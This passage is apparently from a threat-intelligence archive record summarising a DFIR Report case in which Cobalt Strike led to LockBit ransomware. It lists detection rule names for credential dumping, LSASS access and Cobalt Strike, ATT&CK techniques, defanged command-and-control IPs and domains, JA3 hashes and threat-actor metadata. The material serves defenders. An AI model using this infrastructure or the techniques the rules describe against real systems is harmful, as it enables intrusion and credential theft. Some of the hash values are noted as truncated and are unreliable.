SMB\r\nET POLICY PE EXE or DLL Windows file download HTTP\r\nETPRO MALWARE Unknown Golang Backdoor Activity\r\nETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1\r\nETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2\r\nETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2\r\nETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1\r\nET INFO Abused File Sharing Site Domain Observed (qaz .im) in TLS SNI\r\nSigma\r\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Public Rules Repo:\r\ndee0aaa1-b7d7-4be0-ac30-2add7b88d259 : Operator Bring Your Own Tools\r\nDFIR Private Rules:\r\n1aafd4cc-cb38-498b-9365-394f71fd872c : Veeam Credential Dumping Script\r\nb878e8c2-bfa5-4b1d-8868-a798f57d197a : Veeam Credential Dumping Script Execution\r\nbaa9adf9-a01c-4c43-ac57-347b630bf69e : Default Cobalt Strike Named Pipes\r\n213d8255-f359-410b-ac27-e7e85c6394a8 : Suspicious Binaries 
in Public Folders\r\n6df37102-c993-4133-ad3d-b12ca32e03c6 : Detect Process Creation via WMIC with Remote Node\r\nSigma Repo:\r\n9f22ccd5-a435-453b-af96-bf99cbb594d4 : WinAPI Function Calls Via PowerShell Scripts\r\n19d65a1c-8540-4140-8062-8eb00db0bba5 : WinAPI Library Calls Via PowerShell Scripts\r\n1f49f2ab-26bc-48b3-96cc-dcffbc93eadf : Potential Suspicious PowerShell Keywords\r\ndf69cb1d-b891-4cd9-90c7-d617d90100ce : Suspicious FromBase64String Usage On Gzip Archive : Ps Script\r\n1ff315dc-2a3a-4b71-8dde-873818d25d39 : New BITS Job Created Via Bitsadmin\r\na762e74f-4dce-477c-b023-4ed81df600f9 : Scheduled Task Created : FileCreation\r\n93ff0ceb-e0ef-4586-8cd8-a6c277d738e3 : Scheduled Task Created : Registry\r\n87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 : Change PowerShell Policies to an Insecure Level\r\nf4bbd493-b796-416e-bbf2-121235348529 : Non Interactive PowerShell Process Spawned\r\n734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8 : Remote PowerShell Session Host Process (WinRM)\r\n8de1cbe8-d6f5-496d-8237-5f44a721c7a0 : Whoami.EXE Execution Anomaly\r\n502b42de-4306-40b4-9596-6f590c81f073 : Local Accounts Discovery\r\ne4a74e34-ecde-4aab-b2fb-9112dd01aed0 : Dynamic CSharp Compile Artefact\r\n61065c72-5d7d-44ef-bf41-6a36684b545f : Elevated System Shell Spawned\r\n0eb46774-f1ab-4a74-8238-1155855f2263 : Disable Windows Defender Functionalities Via Registry Keys\r\nfb843269-508c-4b76-8b8d-88679db22ce7 : Suspicious Execution of Powershell with Base64\r\n89ca78fd-b37c-4310-b3d3-81a023f83936 : Schtasks Creation Or Modification With SYSTEM Privileges\r\n3a6586ad-127a-4d3b-a677-1e6eacdf8fde : Windows Shell/Scripting Processes Spawning Suspicious Programs\r\n1f21ec3f-810d-4b0e-8045-322202e22b4b : Network Connection Initiated By PowerShell Process\r\n7cccd811-7ae9-4ebe-9afd-cb5c406b824b : Potential Execution of Sysinternals Tools\r\n0e7163d4-9e19-4fa7-9be6-000c61aad77a : 
CobaltStrike Named Pipe Pattern Regex\r\neeb2e3dc-c1f4-40dd-9bd5-149ee465ad50 : Remote Thread Creation Via PowerShell\r\nb5de0c9a-6f19-43e0-af4e-55ad01f550af : Unsigned DLL Loaded by Windows Utility\r\n9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c : DLL Load By System Process From Suspicious Locations\r\n61a7697c-cb79-42a8-a2ff-5f0cdfae0130 : Potential CobaltStrike Service Installations : Registry\r\ned74fe75-7594-4b4b-ae38-e38e3fd2eb23 : Outbound RDP Connections Over Non-Standard Tools\r\ncdc8da7d-c303-42f8-b08c-b4ab47230263 : Rundll32 Internet Connection\r\n1277f594-a7d1-4f28-a2d3-73af5cbeab43 : Windows Shell/Scripting Application File Write to Suspicious Folder\r\nbcb03938-9f8b-487d-8d86-e480691e1d71 : Network Connection Initiated From Users\\Public Folder\r\ne37db05d-d1f9-49c8-b464-cee1a4b11638 : PUA : Rclone Execution\r\n02ee49e2-e294-4d0f-9278-f5b3212fc588 : New RUN Key Pointing to Suspicious Folder\r\n20f0ee37-5942-4e45-b7d5-c5b5db9df5cd : CurrentVersion Autorun Keys Modification\r\n69bd9b97-2be2-41b6-9816-fb08757a4d1a : Potentially Suspicious Execution From Parent Process In Public Folder\r\nfff9d2b7-e11c-4a69-93d3-40ef66189767 : Suspicious Copy From or To System Directory\r\n259e5a6a-b8d2-4c38-86e2-26c5e651361d : PsExec Service File Creation\r\n2ddef153-167b-4e89-86b6-757a9e65dcac : File Download Via Bitsadmin To A Suspicious Target Folder\r\nd21374ff-f574-44a7-9998-4a8c8bf33d7d : WmiPrvSE Spawned A Process\r\nd059842b-6b9d-4ed1-b5c3-5b89143c6ede : File Download Via Bitsadmin\r\nfa34b441-961a-42fa-a100-ecc28c886725 : LSASS Access From Program In Potentially Suspicious Folder\r\n5ef9853e-4d0e-4a70-846f-a9ca37d876da : Potential Credential Dumping Activity Via LSASS\r\n4f86b304-3e02-40e3-aa5d-e88a167c9617 : Scheduled Task Deletion\r\n36210e0d-5b19-485d-a087-c096088885f0 : Suspicious PowerShell Parameter Substring\r\n5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE\r\n526be59f-a573-4eea-b5f7-f0973207634d : New Process Created Via 
Wmic.EXE\r\n602a1f13-c640-4d73-b053-be9a2fa58b96 : HackTool : Powerup Write Hijack DLL\r\n37ae075c-271b-459b-8d7b-55ad5f993dd8 : File or Folder Permissions Modifications\r\n178e615d-e666-498b-9630-9ed3630381 : Elevated System Shell Spawned From Uncommon Parent Location\r\ne6e88853-5f20-4c4a-8d26-cd469fd8d31f : Ntdsutil Abuse\r\nYara\r\nELASTIC_Windows_Ransomware_Lockbit_369E1E94\r\nMALPEDIA_Win_Lockbit_Auto\r\nMAL_RANSOM_LockBit_Apr23_1\r\nMAL_RANSOM_LockBit_ForensicArtifacts_Apr23_1\r\nSIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1\r\nSIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1\r\nCobaltStrike_Resources_Httpsstager_Bin_v2_5_through_v4_x\r\nCobaltStrike_Resources_Xor_Bin_v2_x_to_v4_x\r\nCobaltStrike_Sleep_Decoder_Indicator\r\nCobaltbaltstrike_Beacon_XORed_x86\r\nCobaltbaltstrike_RAW_Payload_https_stager_x86\r\nHKTL_CobaltStrike_Beacon_4_2_Decrypt\r\nHKTL_CobaltStrike_Beacon_Strings\r\nHKTL_CobaltStrike_SleepMask_Jul22\r\nHKTL_Win_CobaltStrike\r\nSUSP_PS1_JAB_Pattern_Jun22_1\r\nWiltedTulip_WindowsTask\r\nWindows_Shellcode_Generic_8c487e57\r\nWindows_Trojan_CobaltStrike_3dc22d14\r\nWindows_Trojan_CobaltStrike_8d5963a2\r\nWindows_Trojan_CobaltStrike_b54b94ac\r\nWindows_Trojan_Metasploit_24338919\r\nWindows_Trojan_Metasploit_38b8ceec\r\nWindows_Trojan_Metasploit_7bc0f998\r\nWindows_Trojan_Metasploit_c9773203\r\nMITRE ATT&CK\r\nCredentials In Files - T1552.001\r\nData Encrypted for Impact - T1486\r\nDisable or Modify Tools - T1562.001\r\nDomain Account - T1087.002\r\nDomain Groups - T1069.002\r\nDomain Trust Discovery - T1482\r\nExfiltration Over Alternative Protocol - T1048\r\nExfiltration to Cloud Storage - T1567.002\r\nGroup Policy Discovery - T1615\r\nLSASS Memory - T1003.001\r\nMalicious File - T1204.002\r\nMasquerading - T1036\r\nMatch Legitimate Name or Location - T1036.005\r\nNTDS - T1003.003\r\nPowerShell - T1059.001\r\nProcess 
Discovery - T1057\r\nProcess Injection - T1055\r\nProxy - T1090\r\nRegistry Run Keys / Startup Folder - T1547.001\r\nRemote Desktop Protocol - T1021.001\r\nRemote System Discovery - T1018\r\nScheduled Task - T1053.005\r\nService Execution - T1569.002\r\nSMB/Windows Admin Shares - T1021.002\r\nWeb Protocols - T1071.001\r\nWindows Command Shell - T1059.003\r\nWindows Management Instrumentation - T1047\r\nWindows Remote Management - T1028 (deprecated ID; the current ATT&CK ID for this technique is T1021.006)\r\nInternal case #TB27138 #PR34378\r\nSource: https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nCobalt Strike C2 TLS fingerprints (JA3/JA3S) for the infrastructure contacted by the setup_wm.exe beacon; table recovered from page 15, Command and Control section. The JA3S values are 30 hex characters rather than 32 and appear truncated in the extraction.\r\nIP | Port | Domain | JA3 | JA3S\r\n31.172.83[.]162 | 443 | compdatasystems[.]com | a0e9f5d64349fb13191bc781f81f42e1 | 8ed408107f89c53261bf74e58517bc\r\n31.172.83[.]162 | 443 | user.compdatasystems[.]com | a0e9f5d64349fb13191bc781f81f42e1 | 8ed408107f89c53261bf74e58517bc\r\n159.100.14[.]254 | 443 | retailadvertisingservices[.]com | a0e9f5d64349fb13191bc781f81f42e1 | 303951d4c50efb2e991652225a6f02",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/"
	],
	"report_names": [
		"cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434204,
	"ts_updated_at": 1775826692,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/48b8addb3e40a7f846774985d88c3e591b143efa.pdf",
		"text": "https://archive.orkl.eu/48b8addb3e40a7f846774985d88c3e591b143efa.txt",
		"img": "https://archive.orkl.eu/48b8addb3e40a7f846774985d88c3e591b143efa.jpg"
	}
}